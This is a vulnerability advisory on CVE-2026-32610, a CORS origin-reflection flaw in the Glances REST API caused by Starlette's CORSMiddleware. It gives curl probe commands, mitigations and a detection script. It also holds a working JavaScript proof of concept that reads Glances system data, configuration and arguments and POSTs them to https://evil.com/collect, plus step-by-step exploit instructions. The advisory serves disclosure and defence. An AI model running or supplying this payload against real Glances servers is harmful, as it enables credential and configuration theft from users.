Glances (Starlette CORSMiddleware) CORS Origin Reflection Vulnerability CVE-2026-32610 (High) -DC-Jun2026-464

How CVE-2026-32610 Works

The Glances REST API web server, prior to version 4.5.2, ships with a default CORS (Cross-Origin Resource Sharing) configuration that sets `allow_origins=["*"]` combined with `allow_credentials=True`. According to the CORS specification, browsers must reject responses that include both `Access-Control-Allow-Origin: *` and `Access-Control-Allow-Credentials: true`; this combination is explicitly forbidden because it would allow any website to make authenticated cross-origin requests.

However, Starlette's `CORSMiddleware` implements a workaround: when `allow_origins=["*"]` and `allow_credentials=True`, instead of returning the literal `*` wildcard, the middleware reflects the requesting `Origin` header value back in the `Access-Control-Allow-Origin` response header. The server therefore echoes whatever origin the attacker supplies, while simultaneously sending `Access-Control-Allow-Credentials: true`.

The issue manifests as follows:

  • An attacker hosts a malicious page on `https://evil.com`.
  • A victim who has an active authenticated session with a Glances instance (via browser Basic Auth or other cookie-based authentication) visits the attacker's page.
  • The malicious JavaScript issues a `fetch()` request to a Glances API endpoint (e.g., `http://glances-server:61208/api/4/config`) with `credentials: "include"`.
  • The browser automatically attaches the stored credentials (Basic Auth headers, cookies, etc.) to the request.
  • Starlette's `CORSMiddleware` sees the request's `Origin: https://evil.com` and responds with:
    – `Access-Control-Allow-Origin: https://evil.com`
    – `Access-Control-Allow-Credentials: true`
  • The browser, seeing that the reflected origin matches the requesting page's origin and that credentials are allowed, permits JavaScript to read the full response body.
  • The attacker exfiltrates sensitive data such as system monitoring information, configuration secrets, command-line arguments (which may contain passwords and API keys), and more.

The preflight (OPTIONS) request for non-simple requests also echoes the requested headers back, approving credentialed requests for methods like POST and custom headers. When Glances runs without the `--password` flag (the default for most internal network deployments), no authentication is required at all, so any website can directly read all API endpoints.

DailyCVE Form

| Field | Value |
|-|-|
| Platform | Glances REST API (Starlette CORSMiddleware) |
| Version | < 4.5.2 |
| Vulnerability | CORS origin reflection with credentials |
| Severity | High (CVSS 8.1) |
| Date | 2026-03-18 |
| Prediction | Already patched in v4.5.2 (2026-03-14) |

What Undercode Say

Analytics & Verification Commands

```bash
# Start Glances web server (default, no password)
glances -w

# Verify CORS headers from a malicious origin
curl -s -D- -o /dev/null \
  -H "Origin: https://evil.com" \
  http://localhost:61208/api/4/all
# Expected response headers:
#   Access-Control-Allow-Origin: https://evil.com
#   Access-Control-Allow-Credentials: true

# Verify data theft without authentication
curl -s http://localhost:61208/api/4/all | python -m json.tool | head -20
curl -s http://localhost:61208/api/4/config | python -m json.tool
curl -s http://localhost:61208/api/4/args | python -m json.tool

# With authentication enabled, verify credentialed requests work
glances -w --password
curl -s -D- -o /dev/null \
  -X OPTIONS \
  -H "Origin: https://evil.com" \
  -H "Access-Control-Request-Method: GET" \
  -H "Access-Control-Request-Headers: Authorization" \
  http://localhost:61208/api/4/all
# Expected: Access-Control-Allow-Origin: https://evil.com
# Expected: Access-Control-Allow-Credentials: true
```

Proof-of-Concept (JavaScript)

```html
<!-- steal-glances.html hosted on attacker's server -->
<script>
async function steal() {
  const target = "http://glances-server:61208";
  // Steal system stats (processes, CPU, memory, network, disk)
  const all = await fetch(target + "/api/4/all", { credentials: "include" });
  const allData = await all.json();
  // Steal configuration (may contain database passwords, API keys)
  const config = await fetch(target + "/api/4/config", { credentials: "include" });
  const configData = await config.json();
  // Steal command line args (contains password hash, SNMP creds)
  const args = await fetch(target + "/api/4/args", { credentials: "include" });
  const argsData = await args.json();
  // Exfiltrate to attacker
  fetch("https://evil.com/collect", {
    method: "POST",
    body: JSON.stringify({ all: allData, config: configData, args: argsData })
  });
}
steal();
</script>
```

Exploit

An attacker can exploit this vulnerability in four simple steps:
1. Host a malicious page on a domain they control (e.g., `https://evil.com/steal.html`).
2. Lure a victim who has an active authenticated session with a Glances instance to visit that page. The victim may have authenticated via the browser's Basic Auth dialog (which caches credentials) or via cookies.
3. Execute cross-origin requests from the malicious page to the Glances API endpoints using `fetch()` with `credentials: "include"`. The browser automatically attaches the stored credentials.
4. Exfiltrate the response data: the server reflects the attacker's origin in `Access-Control-Allow-Origin` and allows credentials, so the browser grants full read access to the response. The attacker can then steal system stats, configuration files, command-line arguments, and even perform state-changing operations like clearing event logs or modifying process monitoring.

With Glances running without `--password` (the default), no authentication is required, making the attack trivial: any website visited by a user on the same network can silently read all API endpoints.

Protection

To mitigate this vulnerability, apply one of the following fixes:

1. Upgrade to Glances version 4.5.2 or later, which addresses this issue.
2. Change the default CORS credentials setting to `False` in `glances/outputs/glances_restful_api.py`:

```python
cors_credentials = config.get_bool_value('outputs', 'cors_credentials', default=False)  # changed from True
```

3. When credentials are required, configure explicit allowed origins instead of using the wildcard:

```python
cors_origins = config.get_list_value('outputs', 'cors_origins', default=["https://trusted-domain.com"])
```

4. Reject the insecure combination at startup by warning and forcing `cors_credentials = False` when `cors_origins == ["*"]`.
5. Restrict allowed methods to only those necessary (e.g., `["GET"]` instead of `["*"]`).
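As an added example (not code from Glances or Starlette), the block below does two things a defender would want from the verification commands and the protection list: it parses `curl -D-` style response headers and flags the origin-reflection-plus-credentials condition, and it applies the startup guard from fix 4 to a `(cors_origins, cors_credentials)` pair. The sample headers and the probe origin `https://probe.example` are constructed for the demo.

```python
# Added example, not Glances or Starlette code. Detects reflected-origin +
# credentials in captured response headers and applies the startup guard
# from fix 4. Sample headers and https://probe.example are constructed.

def parse_headers(raw: str) -> dict:
    """Parse 'curl -D-' style raw response headers; keys are lowercased."""
    headers = {}
    for line in raw.splitlines()[1:]:  # first line is the status line
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    return headers


def reflects_origin_with_credentials(raw: str, probe_origin: str) -> bool:
    """True when the server echoed an arbitrary probe Origin and also sent
    Access-Control-Allow-Credentials: true, i.e. the CVE-2026-32610 pattern."""
    h = parse_headers(raw)
    reflected = h.get("access-control-allow-origin") == probe_origin
    credentialed = h.get("access-control-allow-credentials", "").lower() == "true"
    return reflected and credentialed


def effective_cors_settings(cors_origins: list, cors_credentials: bool):
    """Startup guard: a wildcard origin list never carries credentials.
    Returns (origins, credentials, warning); warning is None if unchanged."""
    if cors_credentials and "*" in cors_origins:
        warn = "cors_credentials forced to False because cors_origins contains '*'"
        return list(cors_origins), False, warn
    return list(cors_origins), cors_credentials, None


# Constructed samples in the shape of the curl output shown above.
VULNERABLE_RESPONSE = """HTTP/1.1 200 OK
content-type: application/json
access-control-allow-origin: https://probe.example
access-control-allow-credentials: true
"""
PATCHED_RESPONSE = """HTTP/1.1 200 OK
content-type: application/json
access-control-allow-origin: *
"""

if __name__ == "__main__":
    for label, raw in (("vulnerable", VULNERABLE_RESPONSE), ("patched", PATCHED_RESPONSE)):
        hit = reflects_origin_with_credentials(raw, "https://probe.example")
        print(f"{label}: origin reflection with credentials = {hit}")
    print(effective_cors_settings(["*"], True))
```

Feed `reflects_origin_with_credentials` the output of the `curl -D-` probe above (with any origin you choose) to confirm whether a running instance is still affected.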

Impact

- Without `--password` (default): any website visited by a user on the same network can silently read all Glances API endpoints, including complete system monitoring data (process list with command lines, CPU/memory/disk stats, network interfaces, filesystem mounts, Docker container info), configuration file contents (which may contain database passwords, export backend credentials, API keys), and command-line arguments.
- With `--password`: if the user has previously authenticated via the browser's Basic Auth dialog (which caches credentials), any website can make cross-origin requests that carry those cached credentials. This allows exfiltration of all the above data plus the password hash itself (via `/api/4/args`).
- Network reconnaissance: an attacker can use this to map internal network infrastructure by having victims visit a page that probes the Glances port (61208) on internal IPs.
- State-changing attacks: the CORS policy also allows POST methods, enabling an attacker to clear event logs (`/api/4/events/clear/all`) or modify process monitoring (`/api/4/processes/extended/{pid}`).
- CVSS Score: 8.1 (High); vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N.


Sources:

Reported By: github.com